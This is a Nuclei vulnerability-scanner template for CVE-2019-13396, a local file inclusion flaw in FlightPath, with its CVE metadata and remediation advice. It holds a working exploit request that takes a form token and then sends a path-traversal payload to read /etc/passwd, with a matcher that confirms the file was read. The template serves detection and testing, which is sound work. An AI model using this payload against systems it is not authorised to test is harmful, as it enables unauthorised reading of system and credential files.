nuclei-templates/http/cves/2019/CVE-2019-13396.yaml

59 lines
1.8 KiB
YAML
Raw Normal View History

2022-01-10 23:58:14 +00:00
id: CVE-2019-13396
2022-01-10 23:58:14 +00:00
info:
name: FlightPath - Local File Inclusion
2022-01-31 18:35:35 +00:00
author: 0x_Akoko,daffainfo
severity: medium
description: FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion.
2023-09-06 12:53:28 +00:00
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
2022-01-10 23:58:14 +00:00
reference:
- https://www.exploit-db.com/exploits/47121
- http://getflightpath.com/node/2650
- https://nvd.nist.gov/vuln/detail/CVE-2019-13396
2022-01-10 23:58:14 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2019-13396
cwe-id: CWE-22
2023-07-11 19:49:27 +00:00
epss-score: 0.02107
epss-percentile: 0.87923
2023-09-06 12:53:28 +00:00
cpe: cpe:2.3:a:getflightpath:flightpath:*:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: getflightpath
product: flightpath
tags: cve,cve2019,flightpath,lfi,edb
2022-01-10 23:58:14 +00:00
http:
2022-01-10 23:58:14 +00:00
- raw:
2022-01-31 18:35:35 +00:00
- |
GET /login HTTP/1.1
Host: {{Hostname}}
2022-01-10 23:58:14 +00:00
- |
POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
Host: {{Hostname}}
2022-01-31 18:35:35 +00:00
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
2022-01-10 23:58:14 +00:00
2022-01-31 18:35:35 +00:00
callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd
2022-01-10 23:58:14 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
2022-01-31 18:35:35 +00:00
extractors:
- type: regex
name: token
group: 1
regex:
- "idden' name='form_token' value='([a-z0-9]+)'>"
2023-07-11 19:49:27 +00:00
internal: true
part: body
# digest: 4a0a00473045022002e396e7a1d63165d8e561a47fa2308ae71dce099f8f1bc1bd59269cc9b2f1e1022100ac8a741a9bda49aa5eccbf1c7199e9739bf056cdc058b46677078b064279e318:922c64590222798bb761d5b6d8e72950